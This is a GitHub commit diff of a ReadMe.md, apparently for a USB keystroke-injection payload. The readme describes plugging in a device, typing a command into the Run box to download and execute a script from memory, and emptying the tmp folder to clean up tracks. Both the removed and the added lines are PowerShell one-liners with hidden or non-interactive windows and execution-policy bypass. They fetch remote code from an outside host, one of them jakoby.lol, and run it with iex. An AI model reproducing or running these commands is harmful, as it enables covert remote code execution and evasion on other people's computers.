Update ReadMe.md

This commit is contained in:
I-Am-Jakoby 2022-12-18 14:48:58 -06:00 committed by GitHub
parent 06ed91eef9
commit 53da733043
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -36,8 +36,9 @@ and lastly to clean up your tracks behind you the tmp folder will be emptied and
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* Place your images URL in the $url variable
``` ```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <URL for your hosted payload>?dl=1; invoke-expression $pl powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';iwr jakoby.lol/pkw | iex
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>